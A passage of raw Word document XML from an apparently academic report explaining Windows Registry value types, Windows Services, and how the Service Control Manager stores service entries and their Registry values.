            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Data represented by a number that is a 64-bit integer. This data is displayed in Registry Editor as a Binary Value and was introduced in Windows 2000.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC7DDE" w:rsidRPr="00ED091A" w:rsidRDefault="00DC7DDE" w:rsidP="00DC7DDE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc485303801"/>
      <w:r w:rsidRPr="00ED091A">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5</w:t>
      </w:r>
      <w:r w:rsidR="00A91688">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Registry value types and their descriptions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="00DC7DDE" w:rsidRDefault="00DC7DDE" w:rsidP="00DC7DDE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00ED091A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-us/help/256986/windows-registry-information-for-advanced-users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DC7DDE" w:rsidRPr="00DC7DDE" w:rsidRDefault="00DC7DDE" w:rsidP="00DC7DDE"/>
    <w:p w:rsidR="00C44A6F" w:rsidRPr="002B7F94" w:rsidRDefault="00C44A6F" w:rsidP="000C11BF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00095BB2" w:rsidRDefault="00E41963" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc485303719"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00095BB2">
        <w:t xml:space="preserve"> Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="00095BB2" w:rsidRDefault="00095BB2" w:rsidP="00095BB2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00095BB2" w:rsidRDefault="00095BB2" w:rsidP="00095BB2">
      <w:r>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Service</w:t>
      </w:r>
      <w:r w:rsidR="00DB49AE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="-1145814098"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00DB49AE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DB49AE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Service \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00DB49AE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(2)</w:t>
          </w:r>
          <w:r w:rsidR="00DB49AE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00DB49AE">
        <w:t xml:space="preserve"> is a computer program which operates silently in the background of the Microsoft </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00DB49AE">
        <w:t xml:space="preserve"> Operation System. Window Service program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> offers an ability for user to create a persistent and auto-running executable applications. </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00DB49AE">
        <w:t xml:space="preserve"> services can be started automatically when system boots, or can be stopped, paused and change without interfering any concurrent working users on that local system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB49AE" w:rsidRDefault="00DB49AE" w:rsidP="00095BB2">
      <w:r>
        <w:t>A service</w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the window service program is an entity that must conform to the rules, protocols and policy of the Service Control Manager</w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t xml:space="preserve"> (SCM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t xml:space="preserve">Besides that, </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t xml:space="preserve"> also support for driver service, which conforms to the device driver protocols for working with system devices. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB49AE" w:rsidRDefault="00062D79" w:rsidP="00062D79">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Service Control Manager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A6051" w:rsidRPr="006A6051" w:rsidRDefault="00E41963" w:rsidP="006A6051">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="006A6051" w:rsidRPr="006A6051">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Servic</w:t>
      </w:r>
      <w:r w:rsidR="006A6051">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="006A6051" w:rsidRPr="006A6051">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>s and Service Control Manager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C365B" w:rsidRDefault="00E41963" w:rsidP="003C365B">
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> Services</w:t>
      </w:r>
      <w:r w:rsidR="00FB3953">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="1739511146"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Mic \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(6)</w:t>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> are application that run on </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> computers regardless of whether a user is logged in. A </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> services is an entity that comprise a</w:t>
      </w:r>
      <w:r w:rsidR="00D5205D">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> executable file, a directory for storing application components, and </w:t>
      </w:r>
      <w:r>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> settings that define the parameters used for that service. A </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> service can be started automatically when the system is boot, or </w:t>
      </w:r>
      <w:r w:rsidR="00006825">
        <w:t xml:space="preserve">manually by a software that control the service. Services can be controlled by any program that integrated a service control method, which is a Remote Procedure Call (RPC) </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1329481418"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB3953" w:rsidRPr="007E1A04">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="007E1A04">
            <w:instrText xml:space="preserve">CITATION MSD1 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="007E1A04">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="007E1A04">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(7)</w:t>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="007E1A04">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="560368523"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB3953" w:rsidRPr="007E1A04">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="007E1A04">
            <w:instrText xml:space="preserve">CITATION MSD \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="007E1A04">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="007E1A04">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> (8)</w:t>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="007E1A04">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D5205D" w:rsidRPr="00D5205D">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00006825">
        <w:t>to SCM functions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173F3F" w:rsidRDefault="00B37AF9" w:rsidP="00062D79">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Service Control Manager (SCM) is a </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00803051">
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:t xml:space="preserve"> for managing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and control</w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:t>ling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application services and driver services</w:t>
      </w:r>
      <w:r w:rsidR="00AF24DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1443188206"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00AF24DE" w:rsidRPr="007E1A04">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="007E1A04">
            <w:instrText xml:space="preserve">CITATION Tec05 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00AF24DE" w:rsidRPr="007E1A04">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="007E1A04">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(9)</w:t>
          </w:r>
          <w:r w:rsidR="00AF24DE" w:rsidRPr="007E1A04">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>. SCM maintains a database of installed services and driver services, and provides a unified and s</w:t>
      </w:r>
      <w:r w:rsidR="009A5E7D">
        <w:t>ecure</w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="009A5E7D">
        <w:t xml:space="preserve"> means of controlling them. SCM database comprise information about each service and how it </w:t>
      </w:r>
      <w:r w:rsidR="00D5205D">
        <w:t>must</w:t>
      </w:r>
      <w:r w:rsidR="009A5E7D">
        <w:t xml:space="preserve"> be handled by the system. </w:t>
      </w:r>
      <w:r w:rsidR="00803051">
        <w:t>The information is mainly about how each service could be started when system boots, which information they need to run their executable applications and what are the security requirements for each service.</w:t>
      </w:r>
      <w:r w:rsidR="009A5E7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:t xml:space="preserve">SCM database is stored in a </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:t xml:space="preserve"> location: </w:t>
      </w:r>
      <w:r w:rsidR="00173F3F" w:rsidRPr="00173F3F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services</w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173F3F" w:rsidRDefault="00173F3F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00062D79" w:rsidRDefault="00173F3F" w:rsidP="00062D79">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In that location, each installed service is stored as an entry key, which name corresponds to the nam</w:t>
      </w:r>
      <w:r w:rsidR="00BC587C">
        <w:t>e of the service (see figure 2.4</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173F3F" w:rsidRDefault="00173F3F" w:rsidP="00173F3F">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2358EADB" wp14:editId="572A2543">
            <wp:extent cx="5581650" cy="3811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3811270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173F3F" w:rsidRPr="00C44A6F" w:rsidRDefault="00173F3F" w:rsidP="00C44A6F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc483834781"/>
      <w:bookmarkStart w:id="47" w:name="_Toc485303764"/>
      <w:r w:rsidRPr="00C44A6F">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2</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5</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> service is stored as an entry key in the SCM database </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> location</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="00173F3F" w:rsidRDefault="00173F3F" w:rsidP="00A2470A">
      <w:r>
        <w:t xml:space="preserve">The name of an entry in this location is called a service name. However, when we work with a service, the name that display by a service management tool (such as sc.exe) is called a display name. The display name can be different to the service name, and is stored in </w:t>
      </w:r>
      <w:r w:rsidR="00A2470A">
        <w:t xml:space="preserve">the service entry key. For example, a service named “AxInstSV” which has its entry key stored at “HKLM\SYSTEM\CurrentControlSet \Services\AxInstSv” has a display name called “ActiveX Installer” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005763A" w:rsidRDefault="0005763A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005763A" w:rsidRDefault="0005763A" w:rsidP="00A2470A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Opening a service entry key in </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Editor, we can see that there are so many </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values for that service. Those </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values are used to specified the information se</w:t>
      </w:r>
      <w:r w:rsidR="00BC587C">
        <w:t>t to the service (see figure 2.5</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005763A" w:rsidRDefault="0005763A" w:rsidP="0005763A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78A02DB3" wp14:editId="0DE4C5AC">
            <wp:extent cx="5581650" cy="3797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3797935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A2470A" w:rsidRPr="00C44A6F" w:rsidRDefault="0005763A" w:rsidP="00C44A6F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc483834782"/>
      <w:bookmarkStart w:id="49" w:name="_Toc485303765"/>
      <w:r w:rsidRPr="00C44A6F">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2</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6</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each service entry key stores many </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> values that specify its information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="00E44D34" w:rsidRDefault="00135336" w:rsidP="00E44D34">
      <w:r>
        <w:t>The following table describe those values and their abilities:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2724"/>
        <w:gridCol w:w="2326"/>
        <w:gridCol w:w="3730"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C5F8C" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="002C2B3F" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2B3F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="002C2B3F" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2B3F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="002C2B3F" w:rsidRDefault="00135336" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2B3F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>DependOnGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_MULTI_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00135336">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t xml:space="preserve">Lists load-ordering groups on which </w:t>
            </w:r>
            <w:r w:rsidR="00E41963">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF58DA">
              <w:t xml:space="preserve"> services depend. Services that depend on a group can run if, after attempting to install all members of a group, at least one member of the group is running.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:t>DependOnService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_MULTI_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3730" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="002C2B3F" w:rsidP="00C44A6F">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002C2B3F">
              <w:t xml:space="preserve">Lists the names of </w:t>
            </w:r>
            <w:r w:rsidR="00E41963">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2B3F">
              <w:t xml:space="preserve"> services on which this service depends. SCM must start these services before it starts this service.</w:t>
            </w:r>
            <w:r w:rsidR="00C44A6F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2B3F">
              <w:t xml:space="preserve">This value can be an </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2B3F">
              <w:lastRenderedPageBreak/>
              <w:t>empty string if the service has no dependencies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00135336" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="00135336" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00135336">
              <w:lastRenderedPageBreak/>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2326" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRDefault="00AF58DA" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF58DA">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
